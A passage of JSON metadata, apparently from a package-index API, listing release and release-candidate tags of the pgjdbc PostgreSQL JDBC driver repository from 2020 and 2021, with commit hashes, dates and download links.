bc/tags/REL42.3.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1/manifests"},{"name":"REL42.3.1","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:23:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1/manifests"},{"name":"REL42.3.1-rc2","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:18:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2/manifests"},{"name":"REL42.3.1-rc1","sha":"b3050e60f81b4e43fae452bcf6df297df2048ae4","kind":"tag","published_at":"2021-10-28T16:27:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1/manifests"},{"name":"REL42.3.0","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-18T15:17:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0/manifests"},{"name":"REL42.3.0-rc2","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-15T12:59:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2/manifests"},{"name":"REL42.2.24","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:15:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24/manifests"},{"name":"REL42.2.24-rc2","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:05:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2/manifests"},{"name":"REL42.2.24-rc1","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:02:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1/manifests"},{"name":"REL42.2.23","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:41:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23/manifests"},{"name":"REL42.2.23-rc6","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6/manifests"},{"name":"REL42.2.23-rc5","sha":"624d8b88dde210447f921725682ebd58e7466bf0","kind":"tag","published_at":"2021-07-05T15:30:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5/manifests"},{"name":"REL42.2.23-rc4","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T14:55:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4/manifests"},{"name":"REL42.2.23-rc3","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:52:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3/manifests"},{"name":"REL42.2.23-rc1","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:37:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1/manifests"},{"name":"REL42.2.22-rc1","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"tag","published_at":"2021-06-16T15:08:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1/manifests"},{"name":"REL42.2.22","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"commit","published_at":"2021-06-16T14:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22/manifests"},{"name":"REL42.2.21","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:44:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21/manifests"},{"name":"REL42.2.21-rc2","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:23:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2/manifests"},{"name":"REL42.2.21-rc1","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:21:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1/manifests"},{"name":"REL42.2.20","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:23:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20/manifests"},{"name":"REL42.2.20-rc2","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:03:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2/manifests"},{"name":"REL42.2.20-rc1","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T12:37:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1/manifests"},{"name":"REL42.2.19","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T19:32:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19/manifests"},{"name":"REL42.2.19-rc2","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T18:45:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2/manifests"},{"name":"REL42.2.19-rc1","sha":"18cec592278e7f16bacdd5083017686be41d9da6","kind":"tag","published_at":"2021-02-18T15:21:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1/manifests"},{"name":"REL42.2.18","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:45:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18/manifests"},{"name":"REL42.2.18-rc1","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:12:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1/manifests"},{"name":"REL42.2.17","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T13:43:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17/manifests"},{"name":"REL42.2.17-rc1","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T12:29:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1/manifests"},{"name":"REL42.2.16","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T19:33:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16/manifests"},{"name":"REL42.2.16-rc2","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T18:15:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2/manifests"},{"name":"REL42.2.16-rc1","sha":"3792f47ebfad1f7c746abcc1f6ed6d0411fbbb0c","kind":"tag","published_at":"2020-08-21T17:04:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1/manifests"},{"name":"REL42.2.15","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-14T18:24:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15/manifests"},{"name":"REL42.2.15-rc2","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-07T15:16:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc2/manifests"},{"name":"REL42.2.15-rc1","sha":"6bacf8d4570e8a23e6f57cf3138a68725b4b4ad6","kind":"tag","published_at":"2020-06-19T16:39:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15-rc1/manifests"},{"name":"REL42.2.14","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T16:56:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14/manifests"},{"name":"REL42.2.14-rc1","sha":"acd0724411fc5dde7a57263c48013048e001c641","kind":"tag","published_at":"2020-06-10T14:44:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.14-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.14-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.14-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.14-rc1/manifests"},{"name":"REL42.2.13","sha":"e63584cfb2bbb904a971a0b19cb4857249e0b8e2","kind":"tag","published_at":"2020-06-04T14:41:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13/manifests"},{"name":"REL42.3.0-rc1","sha":"14b62aca4764d496813f55a43d050b017e01eb65","kind":"tag","published_at":"2020-06-01T13:06:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc1/manifests"},{"name":"REL42.2.13-rc1","sha":"ff368032bd539c8b8adac09b7a64d3788281db4d","kind":"tag","published_at":"2020-05-28T13:42:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.13-rc1/manifests"},{"name":"v42.2.13-rc1","sha":"c6b3cd5468c93068c5b528773ca990b9f0b29a1a","kind":"tag","published_at":"2020-05-27T14:41:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/v42.2.13-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/v42.2.13-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@v42.2.13-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/v42.2.13-rc1